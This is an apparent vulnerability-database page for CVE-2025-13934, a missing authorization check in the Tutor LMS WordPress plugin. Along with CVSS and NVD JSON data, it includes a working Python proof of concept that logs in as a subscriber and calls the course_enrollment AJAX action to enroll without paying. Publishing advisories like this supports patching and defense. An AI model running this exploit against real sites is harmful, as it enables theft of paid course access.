Security Vulnerability Report
中文
CVE-2025-13934 CVSS 4.3 MEDIUM

CVE-2025-13934

Published: 2026-01-09 08:15:57
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tutor LMS < 3.9.4
Tutor LMS <= 3.9.3 (所有版本)
WordPress (与Tutor LMS插件配合使用)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13934 PoC - Unauthorized Course Enrollment # Target: WordPress with Tutor LMS plugin <= 3.9.3 def exploit_cve_2025_13934(target_url, username, password, course_id): """ Exploit for Tutor LMS unauthorized course enrollment vulnerability. This PoC demonstrates how an authenticated user with subscriber-level access can enroll in any course without going through the purchase flow. Parameters: target_url: Base URL of the WordPress site username: WordPress user username password: WordPress user password course_id: ID of the course to enroll in (must be integer) """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } print(f"[*] Logging in as {username}...") login_response = session.post(login_url, data=login_data, verify=False) if 'wordpress_logged_in' not in str(session.cookies) and 'Set-Cookie' not in str(login_response.headers): print("[-] Login failed. Check credentials.") return False print("[+] Login successful!") # Step 2: Exploit the vulnerability - Enroll in course without purchase ajax_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'course_enrollment', 'course_id': course_id } print(f"[*] Attempting to enroll in course ID {course_id}...") exploit_response = session.post(ajax_url, data=exploit_data, verify=False) # Check response for successful enrollment if exploit_response.status_code == 200: response_text = exploit_response.text if 'success' in response_text.lower() or 'enrollment' in response_text.lower(): print("[+] SUCCESS! Enrolled in course without authorization!") print(f"[*] Response: {exploit_response.text[:500]}") return True else: print(f"[-] Enrollment failed or unexpected response: {exploit_response.text[:200]}") return False else: print(f"[-] Request failed with status code: {exploit_response.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-13934.py <target_url> <username> <password> <course_id>") print("Example: python cve-2025-13934.py http://example.com testuser testpass 123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] course = sys.argv[4] exploit_cve_2025_13934(target, user, pwd, course)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13934", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:57.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized course enrollment in all versions up to, and including, 3.9.3. This is due to a missing capability check and purchasability validation in the `course_enrollment()` AJAX handler. This makes it possible for authenticated attackers, with subscriber level access and above, to enroll themselves in any course without going through the proper purchase flow."}, {"lang": "es", "value": "El plugin Tutor LMS – solución de eLearning y cursos en línea para WordPress es vulnerable a la inscripción no autorizada en cursos en todas las versiones hasta la 3.9.3, inclusive. Esto se debe a una falta de verificación de capacidad y validación de la posibilidad de compra en el manejador AJAX 'course_enrollment()'. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, se inscriban en cualquier curso sin pasar por el flujo de compra adecuado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3422766/tutor/trunk/classes/Course.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5de212c9-5c2e-4713-b1ce-022dd84520c3?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.